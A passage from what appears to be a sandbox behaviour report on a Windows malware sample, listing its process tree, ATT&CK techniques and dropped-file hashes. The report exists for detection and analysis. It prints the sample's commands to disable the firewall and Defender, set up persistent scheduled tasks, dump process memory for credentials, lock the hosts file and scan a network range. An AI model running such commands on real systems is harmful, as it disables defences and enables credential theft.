  - System Location Discovery: System Language Discovery
  PID:1812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:916
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "uzmeguupv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ruzpterzk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4160
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "ruzpterzk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3984
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1468
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5000
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2864
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2716
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3512
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1680
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4568
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4572
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2772
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3936
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1560
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3176
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:3656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2056
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:3700
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3376
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2428
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:4464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:3412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2584
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:5040
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:3844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3084
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4208
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:2440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:688
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3320
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 788 C:\Windows\TEMP\thgpqiiyn\788.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4200
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1232
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 380 C:\Windows\TEMP\thgpqiiyn\380.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1292
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2164 C:\Windows\TEMP\thgpqiiyn\2164.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4124
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2696 C:\Windows\TEMP\thgpqiiyn\2696.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2984 C:\Windows\TEMP\thgpqiiyn\2984.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3936
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3012 C:\Windows\TEMP\thgpqiiyn\3012.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4236
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2720 C:\Windows\TEMP\thgpqiiyn\2720.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3832 C:\Windows\TEMP\thgpqiiyn\3832.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3808
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3928 C:\Windows\TEMP\thgpqiiyn\3928.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5108
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3988 C:\Windows\TEMP\thgpqiiyn\3988.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3600
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 4084 C:\Windows\TEMP\thgpqiiyn\4084.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:224
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 4476 C:\Windows\TEMP\thgpqiiyn\4476.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3468
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 1428 C:\Windows\TEMP\thgpqiiyn\1428.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3844
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 1104 C:\Windows\TEMP\thgpqiiyn\1104.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2992 C:\Windows\TEMP\thgpqiiyn\2992.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 3064 C:\Windows\TEMP\thgpqiiyn\3064.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3248
- C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe
  C:\Windows\TEMP\thgpqiiyn\wewhpbpmh.exe -accepteula -mp 2532 C:\Windows\TEMP\thgpqiiyn\2532.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\thgpqiiyn\zymuetvrm\scan.bat
  2⤵
  PID:3128
- - C:\Windows\thgpqiiyn\zymuetvrm\eguiemhzp.exe
    eguiemhzp.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1860
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3808
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2640
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:6004

C:\Windows\SysWOW64\lqvjma.exe
C:\Windows\SysWOW64\lqvjma.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3756

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F
1⤵
PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3508
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F
  2⤵
  PID:1656

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F
1⤵
PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3004
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F
  2⤵
  PID:1244

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\euiugba.exe
1⤵
PID:4788
- C:\Windows\ime\euiugba.exe
  C:\Windows\ime\euiugba.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4900

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F
1⤵
PID:5476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5772
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F
  2⤵
  PID:5968

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F
1⤵
PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2024
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F
  2⤵
  PID:5864

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\euiugba.exe
1⤵
PID:4456
- C:\Windows\ime\euiugba.exe
  C:\Windows\ime\euiugba.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\thgpqiiyn\1104.dmp

Filesize
8.7MB

MD5
2d79433ad3e217c5c850aea5e3652591

SHA1
6dc939ec28d265bf965af6aa14fed08f45a113c0

SHA256
8eb5924905588a4a8c0ff812821bfd69108c47bc7621a02a6ce729c0b8975a30

SHA512
4a0affe4d7442fee2a719f847e657dd828210b2ea1eb57872f896a4f09f7e698046a327f781d1e614e9f46dfe4e39069f9af662eaafb06998f4444a8945d9a29

Download Submit
C:\Windows\TEMP\thgpqiiyn\1428.dmp

Filesize
1.2MB

MD5
4e37f0e3fd30e2c410df42e38dc29f77

SHA1
921ab6602e78e11ace354b690fec1017e74ec346

SHA256
1730561657d77fc6f9f761237dbe77971aca72219323ea89a769a1aafb2988b9

SHA512
561b9f23015f2d7bcbde0db8793d0d2549fb5a144eea9639c8b76ed56a173dc97b953199eb7c1beaee2c9841a8518a1efb8d39c3227af550587842256745406d

Download Submit
C:\Windows\TEMP\thgpqiiyn\2164.dmp

Filesize
4.1MB

MD5
6c154f60e66d0348843977c28f2c6e42

SHA1
946d629ea66f2b36c33d2dca339b49e658c5c500

SHA256
73f3a8ce6a5ade54166a1c77100bc8174f1579c17eaa1e7fb0550fd3a78d83cd

SHA512
6a87a16315dcd3b0f6c747ff31fb75f3235bb6b7984297233bb0d32018170c3bcc902973fc77fbe78e29fda2bd1183821b56013607a602b70e6a0e2d70ec7926

Download Submit
C:\Windows\TEMP\thgpqiiyn\2696.dmp

Filesize
7.5MB

MD5
3fba6e0f163c32171381cd4d026c06e8

SHA1
b2022dd7fb84d5e0bda4edcd70acea43e0c52378

SHA256
88cc52401607a594dbd33b90ae5015600ba6f99a179422f1af31b815672de0e1

SHA512
11c39a179874cea1a38c98f9e372c90fdde1810d41cb3a7ac86825ca1d1248004dcbdcb8704bdb0e7996d39ee69d52c5fe0f266c6971679ea3359ae629e81f94

Download Submit
C:\Windows\TEMP\thgpqiiyn\2720.dmp

Filesize
2.9MB

MD5
4cb22bae27490018a7c43f21453b2c96

SHA1
13e57f1f4b784cd524c35c76e77c65daa5070a3c

SHA256
5a2915e2b7359f7b3d0c94e0d4119ae48c5de6cbb0d03e6ed05d9fa3ee867477

SHA512
b2cec13286dc7983ec88bef30cc1e14a4b3dcf118e4e8a96ebd1d9c49dc409e39ab80c8a4eb7882168a6461caeb5d1606e8ca6333dc5001025b93dceddf2ba18

Download Submit
C:\Windows\TEMP\thgpqiiyn\2984.dmp

Filesize
800KB

MD5
aadcc2d83aaea085088521ffa82011ea

SHA1
2432b256adc875992bbf59e9ea99f81abbd674d0

SHA256
2bb8e6c1536b740afa8b1460d72232a4c67af4aeb9ce97764bf619dce5c2da27

SHA512
a31e0dfbfae59dc6bc41c47fc9e6024e11818e955fe55ab1006ca4545ec92f3412b7a1295e6c8e2efe9f642565dbabb3c13fd6cdcd116889df80906540b6cef0

Download Submit
C:\Windows\TEMP\thgpqiiyn\3012.dmp

Filesize
3.7MB

MD5
7a6bea02cae3612295712ede6cbe7921

SHA1
9f0289bb0390216aef0f2cd8a3f824ebbf86c2e1

SHA256
5b45fcfed32c85640ebdb5ac5ae424ba233b9f976988f5817b7dc9d61181d629

SHA512
41594d68968ae45fc6a234958421849db79aaebf14b4bf0bd1350691aa49e8c88ab7f7934d80f88e1b1c2872170cc7258a080e7c36f357d81dddc46c10d74036

Download Submit
C:\Windows\TEMP\thgpqiiyn\380.dmp

Filesize
33.5MB

MD5
f585758541638d707803b29a0b974d33

SHA1
b16961c1aeb480de6cafad4a0ee51aad626d0485

SHA256
390fe6cd3530a1277fae99ced6e5753093c3832650a0ec14621fe86eaa2f8956

SHA512
c6d9457fccb18c4983b681a14fcd355f8b79ea0fa8bfb49e0d99cf889027a79f97be47f7dd80b6ad4ab99b23fb9cc37060911ceee28a478a2791295ace2d2584

Download Submit
C:\Windows\TEMP\thgpqiiyn\3832.dmp

Filesize
2.6MB

MD5
b591ea25b9f4ffd861c00c93a8c35365

SHA1
6380de7493a37addd8954664a286652360515617

SHA256
a75a8a17470f013adcc9e9c4501b0857ed12bf30282fa12839f7b7e66ad91c0b

SHA512
e7c7f61be52307de588b5596893324adab7da732920d11c0c8e854cd3219d54bc08e0a47b032894da07ade7298a986ccbdf297111cab1434426514c46146b2d3

Download Submit
C:\Windows\TEMP\thgpqiiyn\3928.dmp

Filesize
20.9MB

MD5
a85b25cf089cc0cc36a4019c1b7e4318

SHA1
3585c475885d854c05ab5fba7ed034af33329833

SHA256
6b9f3a2fcb05181a5bc11b9a72995945123a3baaacd2acd1a9868dc17b37f6f7

SHA512
5141979b17f6cc2908659f9cbc3999c2d63c2500bd4dd35f4cab0ee0ad3b8feb2fd06c5b7ba89ca38d13b3b328d175370afae5691ec457fc786be152a8bcd493

Download Submit
C:\Windows\TEMP\thgpqiiyn\3988.dmp

Filesize
4.2MB

MD5
7677b12973bbee36f9ae4c9076704ee9

SHA1
fcb068775c24e179946aa8f8d5e42be0d9fd2c01

SHA256
ccfa3f16502ef548132933691b798f717551aeb63d4e8c6c325de0fae18e84fc

SHA512
d2dc30930ec4b52dbf014bde83783bff85ee171769b0cdf9c45f0d23825b3fd1052c9e716c3495c7809a78de521daa988eab2c745be09fca2447b8c91eba9c6f

Download Submit
C:\Windows\TEMP\thgpqiiyn\4084.dmp

Filesize
45.6MB

MD5
942f16807dc5bc98db78ed137cc122a4

SHA1
4f78296143c2c8cfcfd6ee822df8f3c09b0e1615

SHA256
742c8e7eb18fbdc8d7ee4dbb7386ce8257728d33e50265ff1653180e448e5dc7

SHA512
5771e87ed8b347c166658456352e4d9417a6b306470abd51a2dbeae60c95021a354502b9f6c5a96b800e68e5eb532756d76540a31ed06846386ce14646f0377e

Download Submit
C:\Windows\TEMP\thgpqiiyn\4476.dmp

Filesize
25.9MB

MD5
eed0856f99b3b4d5a32eb144a6bc495c

SHA1
a7127eecb883afda07d5d0dc2c832af94e36bce2

SHA256
ae184dca0be0db039e68a2a2d772d1953c0333862818734a4aa48894d981b681

SHA512
5cff9b3a899a9f6b8a2bd6a4835dcb45a3dbec554f6479305e04c5a91a75ab8fe6ddf1242da8c48def0e3c7a8de934a1444571de8ed66792097f226883ce8dc2

Download Submit
C:\Windows\TEMP\thgpqiiyn\788.dmp

Filesize
3.4MB

MD5
6ac576b8af4bf3c093f07eb8fd0c19ba

SHA1
05bb710ea8f9a3666b93940f3e0ac6737c67b245

SHA256
c4f04e2289167168f44c361e07505d016b82eb836bf4381be20c1705c03b306c

SHA512
9e6d18b70292b2a530fc75d0ff2c9a671b11886e9ebd73e8cea2800ec3252cee9cf5a34a5c371554dae67dd3b697670697298b6bee6414ab0e9105bccb2e08f1

Download Submit
C:\Windows\TEMP\tzgyhthhu\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\nsq39CA.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsq39CA.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\thgpqiiyn\wewhpbpmh.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\tzgyhthhu\pctkcm.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\gezmcuhh\euiugba.exe

Filesize
11.1MB

MD5
8c2697c55324b79123e92291182f4a96

SHA1
6e7af52cef09bd31acf8dbf9cf3d8c43cd091f84

SHA256
f954680345bb2168bd9cb1768785820fef244ee4be72f165f530f9943ea1f7e5

SHA512
9ae392bf30f2990410fdea7fa797e534102eb5d00707988e8934c89f2c6e34b96863d15ddfc77cb41fe686c1121d80e5d7bdf528cf0c5619978fe0c7181d37c9

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
